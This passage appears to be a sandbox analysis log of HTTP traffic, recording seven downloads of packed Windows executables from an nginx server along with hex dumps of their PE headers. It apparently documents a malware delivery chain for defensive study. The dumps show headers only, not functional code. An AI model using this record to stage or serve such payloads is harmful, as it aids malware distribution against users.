Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 31 Oct 2024 03:16:08 GMTContent-Type: application/octet-streamContent-Length: 3003904Last-Modified: Thu, 31 Oct 2024 03:03:12 GMTConnection: keep-aliveETag: "6722f370-2dd600"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 53 d3 15 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 4a 04 00 00 d6 00 00 00 00 00 00 00 e0 30 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 31 00 00 04 00 00 aa 22 2e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 a0 05 00 68 00 00 00 00 90 05 00 40 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 a1 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 05 00 00 10 00 00 00 7e 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 40 03 00 00 00 90 05 00 00 04 00 00 00 8e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 05 00 00 02 00 00 00 92 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 70 66 62 6f 79 68 62 6c 00 20 2b 00 00 b0 05 00 00 1a 2b 00 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6d 69 72 64 66 61 75 6e 00 10 00 00 00 d0 30 00 00 06 00 00 00 ae 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 
00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 e0 30 00 00 22 00 00 00 b4 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 31 Oct 2024 03:16:14 GMTContent-Type: application/octet-streamContent-Length: 2085888Last-Modified: Thu, 31 Oct 2024 03:03:25 GMTConnection: keep-aliveETag: "6722f37d-1fd400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b 7d e6 03 f5 2e e6 03 f5 2e e6 03 f5 2e 89 75 5e 2e fe 03 f5 2e 89 75 6b 2e eb 03 f5 2e 89 75 5f 2e dc 03 f5 2e ef 7b 76 2e e5 03 f5 2e 66 7a f4 2f e4 03 f5 2e ef 7b 66 2e e1 03 f5 2e e6 03 f4 2e 89 03 f5 2e 89 75 5a 2e f4 03 f5 2e 89 75 68 2e e7 03 f5 2e 52 69 63 68 e6 03 f5 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 38 6e 1e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 d0 01 00 00 dc 2c 00 00 00 00 00 00 30 71 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 71 00 00 04 00 00 b8 9b 20 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 90 2e 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 91 2e 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 70 2e 00 00 10 00 00 00 76 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 80 2e 00 00 00 00 00 00 86 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 
00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 90 2e 00 00 02 00 00 00 86 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 50 29 00 00 a0 2e 00 00 02 00 00 00 88 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 75 73 69 73 6f 71 6f 69 00 30 19 00 00 f0 57 00 00 24 19 00 00 8a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 67 78 69 71 63 74 6e 00 10 00 00 00 20 71 00 00 04 00 00 00 ae 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 30 71 00 00 22 00 00 00 b2 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 31 Oct 2024 03:16:21 GMTContent-Type: application/octet-streamContent-Length: 919552Last-Modified: Thu, 31 Oct 2024 02:58:24 GMTConnection: keep-aliveETag: "6722f250-e0800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 48 f2 22 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 58 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 0e 00 00 04 00 00 12 c3 0e 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 28 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0d 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 28 9c 00 00 00 40 0d 00 00 9e 00 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 e0 0d 00 00 76 00 00 00 92 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 31 Oct 2024 03:16:27 GMTContent-Type: application/octet-streamContent-Length: 888832Last-Modified: Sun, 27 Oct 2024 06:45:44 GMTConnection: keep-aliveETag: "671de198-d9000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b 7d e6 03 f5 2e e6 03 f5 2e e6 03 f5 2e 89 75 5e 2e fe 03 f5 2e 89 75 6b 2e eb 03 f5 2e 89 75 5f 2e dc 03 f5 2e ef 7b 76 2e e5 03 f5 2e 66 7a f4 2f e4 03 f5 2e ef 7b 66 2e e1 03 f5 2e e6 03 f4 2e 89 03 f5 2e 89 75 5a 2e f4 03 f5 2e 89 75 68 2e e7 03 f5 2e 52 69 63 68 e6 03 f5 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 38 6e 1e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 d0 01 00 00 dc 2c 00 00 00 00 00 90 6c 01 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 d0 2e 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 ab 02 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 2e 00 ec 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8a cf 01 00 00 10 00 00 00 d0 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 e0 2e 72 64 61 74 61 00 00 08 d1 00 00 00 e0 01 00 00 d2 00 00 00 d4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 
00 00 40 2e 64 61 74 61 00 00 00 9c bd 2b 00 00 c0 02 00 00 9e 0a 00 00 a6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 3e 4b 00 00 00 80 2e 00 00 4c 00 00 00 44 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 31 Oct 2024 03:16:28 GMTContent-Type: application/octet-streamContent-Length: 2809344Last-Modified: Thu, 31 Oct 2024 02:58:51 GMTConnection: keep-aliveETag: "6722f26b-2ade00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 40 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 2b 00 00 04 00 00 26 04 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 75 63 78 67 76 69 6e 73 00 80 2a 00 00 a0 00 00 00 7c 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 75 6c 76 74 74 61 6c 00 20 00 00 00 20 2b 00 00 06 00 00 00 b6 2a 00 00 00 00 00 00 
00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 40 2b 00 00 22 00 00 00 bc 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 31 Oct 2024 03:16:43 GMTContent-Type: application/octet-streamContent-Length: 2809344Last-Modified: Thu, 31 Oct 2024 02:58:51 GMTConnection: keep-aliveETag: "6722f26b-2ade00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 40 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 2b 00 00 04 00 00 26 04 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 75 63 78 67 76 69 6e 73 00 80 2a 00 00 a0 00 00 00 7c 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 75 6c 76 74 74 61 6c 00 20 00 00 00 20 2b 00 00 06 00 00 00 b6 2a 00 00 00 00 00 00 
00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 40 2b 00 00 22 00 00 00 bc 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 31 Oct 2024 03:16:49 GMTContent-Type: application/octet-streamContent-Length: 1873920Last-Modified: Thu, 31 Oct 2024 03:03:32 GMTConnection: keep-aliveETag: "6722f384-1c9800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 40 4a 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 4a 00 00 04 00 00 90 ae 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 d8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 27 4a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c 27 4a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 d8 04 00 00 00 
90 06 00 00 04 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 00 2a 00 00 b0 06 00 00 02 00 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 62 6c 65 67 6c 70 6a 70 00 80 19 00 00 b0 30 00 00 7c 19 00 00 f6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6f 7a 6e 63 62 64 65 77 00 10 00 00 00 30 4a 00 00 04 00 00 00 72 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 40 4a 00 00 22 00 00 00 76 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
